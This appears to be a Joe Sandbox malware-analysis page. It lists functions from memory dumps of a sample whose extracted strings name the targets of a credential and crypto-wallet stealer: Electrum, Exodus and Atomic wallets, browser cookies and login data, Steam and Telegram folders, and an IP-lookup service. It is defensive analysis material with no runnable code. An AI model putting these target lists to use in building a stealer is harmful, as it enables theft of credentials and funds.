Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO$$cq$$cq
API String ID: 0-491507079
Opcode ID: a01a1a79df8a3470127537c270239fc2451f56f4493504081b8e366f128e66c3
Instruction ID: 878cd90a0c5fb36d12ba8525e7e66d713f3f38f95ea9de649391f23230e6e1e1
Opcode Fuzzy Hash: a01a1a79df8a3470127537c270239fc2451f56f4493504081b8e366f128e66c3
Instruction Fuzzy Hash: 18818030E1071ACBDB14DF75C9506AEB7B2BF85301F608529D805AB354EF759C46CB81

Function 0827ADC9 Relevance: 4.0, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

$cq, xrefs: 0827B064
displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO, xrefs: 0827AFC8, 0827B02E
$cq, xrefs: 0827B000

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO$$cq$$cq
API String ID: 0-491507079
Opcode ID: 56bf493f11b179dca65e79deff45a77f62bc264fb640e4d88f7b46edaf699c82
Instruction ID: 382bd5acad86952d96416fc309d9cdaea668c28b2427293c1009d3fcd8d92111
Opcode Fuzzy Hash: 56bf493f11b179dca65e79deff45a77f62bc264fb640e4d88f7b46edaf699c82
Instruction Fuzzy Hash: 1E818D30E1071ACBCB15DF79D95469EBBB2FF85301F608529D805AB354EB7AAC46CB80

Function 0827ADF1 Relevance: 4.0, Strings: 3, Instructions: 201COMMON

Download Yara Rule

Strings

$cq, xrefs: 0827B064
displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO, xrefs: 0827AFC8, 0827B02E
$cq, xrefs: 0827B000

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO$$cq$$cq
API String ID: 0-491507079
Opcode ID: 0c38b0fb34e06f11783e25c80482dc9ee9c085981fcee9e84a20f60a184d6833
Instruction ID: 41588370526983f73f4428093480b3c734313815a6103e203194a768095775a8
Opcode Fuzzy Hash: 0c38b0fb34e06f11783e25c80482dc9ee9c085981fcee9e84a20f60a184d6833
Instruction Fuzzy Hash: A9717C30E1071ACBCB15DF79C9506AEB7B2FF85301F608529D805AB394EB79AC46CB80

Function 08270040 Relevance: 3.9, Strings: 3, Instructions: 188COMMON

Download Yara Rule

Strings

[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth, xrefs: 08270148
PHcq, xrefs: 0827024A
LRcq, xrefs: 082700A8

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: LRcq$PHcq$[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
API String ID: 0-2753010662
Opcode ID: ac2578ca13ed3b6149e8577418bc62638c9dcf09885302aa1599a59141fbe425
Instruction ID: 174d15524ba8a2a98354b07b90b3720d3df3f11705865bf72987c4879b7ba601
Opcode Fuzzy Hash: ac2578ca13ed3b6149e8577418bc62638c9dcf09885302aa1599a59141fbe425
Instruction Fuzzy Hash: A261B171B1060A8FDB14DF65C8546AEBBB2BF88311F248529E405EB394DF71AC46CB80

Function 0827B11A Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

$cq, xrefs: 0827B064
displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO, xrefs: 0827AFC8, 0827B02E
$cq, xrefs: 0827B000

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: displayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGO$$cq$$cq
API String ID: 0-491507079
Opcode ID: d680a74fd577e1f11d369c2f4bee515547d9576a8509e67bdfed93eb60a75e5b
Instruction ID: f8073d3c98f9eb91176f69c6f346fcc2d9de202bb13723f8951a3b26af1b3e19
Opcode Fuzzy Hash: d680a74fd577e1f11d369c2f4bee515547d9576a8509e67bdfed93eb60a75e5b
Instruction Fuzzy Hash: E8516E30A1031ACFDB14DF75C5546AEB7B2BF84316F608529D806AB394DB76DC46CB81

Function 07C96E88 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

(gq, xrefs: 07C96F07
(gq, xrefs: 07C96F33
(gq, xrefs: 07C96EDB

Memory Dump Source

Source File: 00000004.00000002.2189085706.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7c90000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: (gq$(gq$(gq
API String ID: 0-3964246382
Opcode ID: 1c53c28139f265e792571e80d42cefac970b234c3abdece6c6eafce7e5c73735
Instruction ID: 030df16f784d887501f92c76f3dfa39ff72122333b7b70c053a0c8fb45e3314b
Opcode Fuzzy Hash: 1c53c28139f265e792571e80d42cefac970b234c3abdece6c6eafce7e5c73735
Instruction Fuzzy Hash: 4C3124727042065FCB94EB6DD450A5FBBE6EFD92603208A29E849DB380EF31DD0683D0

Function 07C98A80 Relevance: 3.3, Instructions: 3312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2189085706.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7c90000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b205a4fd0140016ef03f7e593450a030b074807e86623c02b56cc9f67ce7b705
Instruction ID: 68ea6aff22f8c2f07ba4c1bcc1ef0b5fe63fb3116ea1a18be04ee195c331330e
Opcode Fuzzy Hash: b205a4fd0140016ef03f7e593450a030b074807e86623c02b56cc9f67ce7b705
Instruction Fuzzy Hash: DA635EB4E40218AFEB359B64CC55BEEBA72EB88700F1040E9E2497B2D0DB751E81DF55

Function 08271480 Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

waasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkd, xrefs: 0827154C, 08271630
waasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID:, xrefs: 08271505, 082715E9

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: waasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID:$waasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkd
API String ID: 0-3720219448
Opcode ID: 5a530fb8faac726049ae930f405665e71d209b00a714a730d1310c962ba8e8f6
Instruction ID: 2a630af155512855348a5d0aca210bb34cf6cfb63b4316b7a598a64eeb1a6fa7
Opcode Fuzzy Hash: 5a530fb8faac726049ae930f405665e71d209b00a714a730d1310c962ba8e8f6
Instruction Fuzzy Hash: 2DA15170B106168FEB15EF75C85069EB7B3BFC4300F208629D806AB398DF75AC468B91

Function 08278534 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

(gq, xrefs: 0827A541
(gq, xrefs: 0827A56D

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: (gq$(gq
API String ID: 0-3425431731
Opcode ID: 1f35bb659356187df898b55251f26d2c8ad000930502510ea2fb6d6b868c950a
Instruction ID: f8b662a91f4114084a715b7c6b7f51e1a1554e0b1b820c1bfc49c2afb82f7808
Opcode Fuzzy Hash: 1f35bb659356187df898b55251f26d2c8ad000930502510ea2fb6d6b868c950a
Instruction Fuzzy Hash: EB519030E1075A9FCB05DF69C45469DBBB2FF89310F14866DD40AAB291EB349D85CB90

Function 0827C2F4 Relevance: 2.6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

Strings

Name\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplay, xrefs: 0827C415
SELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile., xrefs: 0827C359

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: Name\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplay$SELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.
API String ID: 0-391745955
Opcode ID: 7d79d9c53cdd203ae2231c7359585d82b16ead38fd8cff1149b8b984c78807d9
Instruction ID: 3c4b9d6b4efbf184b89a7f62bbd83d4631a423e5dd0f226744532491fd0397c3
Opcode Fuzzy Hash: 7d79d9c53cdd203ae2231c7359585d82b16ead38fd8cff1149b8b984c78807d9
Instruction Fuzzy Hash: AD519030B102198FDB58EB79C5646AE76F2AF89205B20447CD806EB364EF36DC02CB91

Function 0827AC58 Relevance: 2.6, Strings: 2, Instructions: 109COMMON

Download Yara Rule

Strings

$cq, xrefs: 0827AD1B
$cq, xrefs: 0827AD0F

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: $cq$$cq
API String ID: 0-2695052418
Opcode ID: 9ebfc7c27c9367686f3928784e5de9be3c59120effba2bbc6e504ff83449da69
Instruction ID: ff2bd50e16d20bf3771b9fbaf39c0c0ac7988742beaeb400a53fd6e81b923e5c
Opcode Fuzzy Hash: 9ebfc7c27c9367686f3928784e5de9be3c59120effba2bbc6e504ff83449da69
Instruction Fuzzy Hash: D5412A30A11215CFCB15EF7AD554A9EBBB2FF88312B608579E4069B354DB39A841CB90

Function 0827B278 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

profiles\Windows\valueexpiras21ation_moas21nth, xrefs: 0827B33F
OpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswS, xrefs: 0827B302

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: OpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswS$profiles\Windows\valueexpiras21ation_moas21nth
API String ID: 0-2956472024
Opcode ID: f6a41da6aaa9b217009eec92386bad7a2ae8fd16cc2186b07aa2b6fbe4844258
Instruction ID: 6dfeba6220224d181e16d0d181e8d9f77e779a1fba22cc6bb7bd3a12784cbc4e
Opcode Fuzzy Hash: f6a41da6aaa9b217009eec92386bad7a2ae8fd16cc2186b07aa2b6fbe4844258
Instruction Fuzzy Hash: 7E317E70F002058FDB44EF79D95469E7BB2FF88210B208A69D409AB759EB35AD85CB90

Function 0827B288 Relevance: 2.6, Strings: 2, Instructions: 88COMMON

Download Yara Rule

Strings

profiles\Windows\valueexpiras21ation_moas21nth, xrefs: 0827B33F
OpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswS, xrefs: 0827B302

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: OpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswS$profiles\Windows\valueexpiras21ation_moas21nth
API String ID: 0-2956472024
Opcode ID: 67d80547d31c348de4eb93983765ef2ad2ad602096bb3ae6a8403c4ef07c4e8e
Instruction ID: 2ceb6dc28afb64e89aea25204113accda9c80daf68aadc905307a8ce65a3a99c
Opcode Fuzzy Hash: 67d80547d31c348de4eb93983765ef2ad2ad602096bb3ae6a8403c4ef07c4e8e
Instruction Fuzzy Hash: 91315E70F002059BDB44EF79D95469E7BB2FF88210F208A29D809AB759EB35AD45CB90

Function 067975E8 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,067974A6), ref: 06797656

Memory Dump Source

Source File: 00000004.00000002.2184575403.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6790000_UzQWEAhf9B.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f5f9bcc20f0a2e7bbf2ab5f0bb2608c1c1b6b423eb109796d0b61a24a7cc0a3c
Instruction ID: 20f32ce8721759cd7edeeb5db80bca0d354aa90e9b01fa511bd1d19b60b35454
Opcode Fuzzy Hash: f5f9bcc20f0a2e7bbf2ab5f0bb2608c1c1b6b423eb109796d0b61a24a7cc0a3c
Instruction Fuzzy Hash: AA1123B5D0064A9FDB10DF9AD844ADEFBF8EF88220F10842AD429A7610D375A546CFA5

Function 06797148 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,067974A6), ref: 06797656

Memory Dump Source

Source File: 00000004.00000002.2184575403.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6790000_UzQWEAhf9B.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dbda655226cc28b23f3edd8874a5c6879d4284b038d2271ea83d39ce110aa461
Instruction ID: 40bb2cf3f229f4164669578ee79361ffa926d876549ba0da38ee7179a7ca6a8f
Opcode Fuzzy Hash: dbda655226cc28b23f3edd8874a5c6879d4284b038d2271ea83d39ce110aa461
Instruction Fuzzy Hash: 8A1123B5C007498FCB14DF9AD844A9EFBF4EF88210F14842AD819B7600D375A545CFA5

Function 02C90CE1 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 02C90D47

Memory Dump Source

Source File: 00000004.00000002.2168131050.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c90000_UzQWEAhf9B.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 27bf2d0c9d39cf436c5d5e2986c17ff4787bcf7bc7fa76c873127613f4e371b4
Instruction ID: 73e53b7fbd3db43b3ab6a45670984e4026100da5076e41e77edc1c6b16c59609
Opcode Fuzzy Hash: 27bf2d0c9d39cf436c5d5e2986c17ff4787bcf7bc7fa76c873127613f4e371b4
Instruction Fuzzy Hash: F21113B2D002498FCB20DFAAC84979EBFF4EF88324F248419C419A7240CB39A5458BA1

Function 02C90CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE ref: 02C90D47

Memory Dump Source

Source File: 00000004.00000002.2168131050.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c90000_UzQWEAhf9B.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: 9010c2c4c61bab40cfe3c87362ba564cd6d41934dab43c714303e5fcdd67dd7f
Instruction ID: a083ef85c3a7062ba1d23797150f83428491bf1e25ff49145f02394fa58ea229
Opcode Fuzzy Hash: 9010c2c4c61bab40cfe3c87362ba564cd6d41934dab43c714303e5fcdd67dd7f
Instruction Fuzzy Hash: 1211F2B5D002498FCB20DFAAC44979EFFF5AB88324F20841AC519A7240CB79A5458BA5

Function 0827BF20 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\., xrefs: 0827C037, 0827C0B1

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: \tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.
API String ID: 0-472092718
Opcode ID: 054f584129176a8640258f4f8d9d99452e38ef7f34bd6618cd85cfffc9a67254
Instruction ID: a47c189372490ade0a0df76ac901625fddb6868212d154cc67ec21a7c933c151
Opcode Fuzzy Hash: 054f584129176a8640258f4f8d9d99452e38ef7f34bd6618cd85cfffc9a67254
Instruction Fuzzy Hash: 66718E70A102198BDB05EF78C95069E77F3BF84300F258968D805AF359DB75AD45CB90

Function 0827BF30 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\., xrefs: 0827C037, 0827C0B1

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: \tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.
API String ID: 0-472092718
Opcode ID: cc9117bae710d2de4d0d489b74b1e5c4a22c2be034c3c48d855d21627eef884e
Instruction ID: aa57de4b3722d524d939670c05607a6ba89044ac9e95d14b2bc9002821b14056
Opcode Fuzzy Hash: cc9117bae710d2de4d0d489b74b1e5c4a22c2be034c3c48d855d21627eef884e
Instruction Fuzzy Hash: 58716F70A102198BDB05EFB8C95469E77F3BF85300F258968E805AF359DF71AD45CB90

Function 067E1550 Relevance: 1.4, Instructions: 1416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2184715676.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67e0000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8156958d77e750a6e1461ed2ff316a5ced9a8766177ddc634b5c2b42bfdb4f81
Instruction ID: 4c1c8583a181d088e98d50a94f0197c4a17063da92da65fd36a8db5b807569ee
Opcode Fuzzy Hash: 8156958d77e750a6e1461ed2ff316a5ced9a8766177ddc634b5c2b42bfdb4f81
Instruction Fuzzy Hash: FCC24D30B002189FCB55DF69CC51EADBBB6FF88700F108099EA56AB361DB71AE458F51

Function 07C96780 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

4'cq, xrefs: 07C9680C

Memory Dump Source

Source File: 00000004.00000002.2189085706.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7c90000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: 4'cq
API String ID: 0-182294849
Opcode ID: e6763a086417e20d4acf196fec64146b372d40e45052a59abc89561c31d7c826
Instruction ID: 4cce34c7d5b63ccae9e0cf45376ffb01149b4184957855f39fdc98ada5f4b67d
Opcode Fuzzy Hash: e6763a086417e20d4acf196fec64146b372d40e45052a59abc89561c31d7c826
Instruction Fuzzy Hash: FE51A7B5A00306DFC705DF68C48499ABBF2FF88314B258AA9E449DB362D730ED45CB90

Function 082741C9 Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

@, xrefs: 08274212

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: da7e437c004eb3194b31a44fee7c009cf4d3166ddb4fe0574bc6b43dbc1a0230
Instruction ID: 2094d3505f1b9812d5a00473a8d26bff9aeec4e091fbb7cbc51ba94eebb987b2
Opcode Fuzzy Hash: da7e437c004eb3194b31a44fee7c009cf4d3166ddb4fe0574bc6b43dbc1a0230
Instruction Fuzzy Hash: 2A51F275A0024ADFDB15DF65C440EEEBFF2AF89301F19816AE904AB261C734ED52CB90

Function 07C96790 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

4'cq, xrefs: 07C9680C

Memory Dump Source

Source File: 00000004.00000002.2189085706.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7c90000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: 4'cq
API String ID: 0-182294849
Opcode ID: c4ea7a100d026a0f872aac4c5c7655e23f52ba9926d2812ab556850857e0ae1a
Instruction ID: fb4d3ad37c7e397eae73313d31553dd0be8939186f30445a9110497f51e78084
Opcode Fuzzy Hash: c4ea7a100d026a0f872aac4c5c7655e23f52ba9926d2812ab556850857e0ae1a
Instruction Fuzzy Hash: A85186F5A00306DFC705DF68C48499ABBF2FF88310B258AA9E4499B362D730ED45CB90

Function 0827AC21 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

$cq, xrefs: 0827AD0F

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: 7c1f2832d48655655e6d4d8c0c15688316f25cec9b8bece676a1cf1c724f9d8d
Instruction ID: ebeda0c88d0a48838d696ada55f671297a51b1648a3b6fa311ffd93c5dceee1c
Opcode Fuzzy Hash: 7c1f2832d48655655e6d4d8c0c15688316f25cec9b8bece676a1cf1c724f9d8d
Instruction Fuzzy Hash: A5414E30A11215CFCB15DF36D454A9EBBB2FF85312B20857DE4069B365DB35AC46CB90

Function 0827AC48 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

$cq, xrefs: 0827AD0F

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: 61728e885c73c8afb358d850eeb72bdf31e80dc23a85ac8d99141dde081b018e
Instruction ID: a8e8ab0a75e352ca269d202ba54542113d0523e8c1d32cabf8c593a339139ac0
Opcode Fuzzy Hash: 61728e885c73c8afb358d850eeb72bdf31e80dc23a85ac8d99141dde081b018e
Instruction Fuzzy Hash: 4A414C30A11215CFCB15EF3AD454A9EBBB2FF88312B60857DD406AB365DB35E842CB90

Function 08272734 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

$cq, xrefs: 08272823

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: 8e20f938815f0cb1596796ae8a41a3816590657aeffa0101bdfdc0b7d4e94c44
Instruction ID: 8021db1725277263576219f7ae8662eea7262e864a31425e519f506435a7ddfd
Opcode Fuzzy Hash: 8e20f938815f0cb1596796ae8a41a3816590657aeffa0101bdfdc0b7d4e94c44
Instruction Fuzzy Hash: 6341CF30A2021ADBDB159B75D8506AE7BB6FF84306F10852DD802AB355DB3A9C45CBA1

Function 082784A8 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

(gq, xrefs: 082798C0

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: (gq
API String ID: 0-1972435379
Opcode ID: 765b5fd359c95945936ccffda39d73acf21dcbb2418b931ea693167410af96ee
Instruction ID: a5a05969c6f5b881279a4355459baf4fb3262486d88d5ac5a86e241669c9eeee
Opcode Fuzzy Hash: 765b5fd359c95945936ccffda39d73acf21dcbb2418b931ea693167410af96ee
Instruction Fuzzy Hash: 0331C131E0434A8FDB11EFB9D8505EEBBB0EF89310B14826ED549E7211EB309945CB91

Function 0827B75C Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

$cq, xrefs: 0827B828

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: $cq
API String ID: 0-2110363268
Opcode ID: b4ef588b8916fc43efaaf44f1048dfe244871a1e358e9b376b5fbde58d7c7fd8
Instruction ID: 804ff7af9d57c783595f4f5c9e05ed6cfbdbd1a77bd0b64523ffd3201d25f755
Opcode Fuzzy Hash: b4ef588b8916fc43efaaf44f1048dfe244871a1e358e9b376b5fbde58d7c7fd8
Instruction Fuzzy Hash: 4731B030A1020ACBDB59DB39D8506AE77F2AF89215F14853DD802AB754DF399C45CBA1

Function 0827C7A0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

PHcq, xrefs: 0827C836

Memory Dump Source

Source File: 00000004.00000002.2189387257.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8270000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: PHcq
API String ID: 0-4245845256
Opcode ID: f8716a87699a003be34a40154045101352311f1e76fe26176920f74683ef16a4
Instruction ID: 6e41dd5fd329a59848f4bfaa127d271f60226f118f6958d2417e6781ea71428c
Opcode Fuzzy Hash: f8716a87699a003be34a40154045101352311f1e76fe26176920f74683ef16a4
Instruction Fuzzy Hash: 0511A871B0020E9BDB149F76D9586AEBBFAEB88311F108029EC06D3344DF359D01CB91

Function 067E344F Relevance: 1.3, Instructions: 1305COMMON

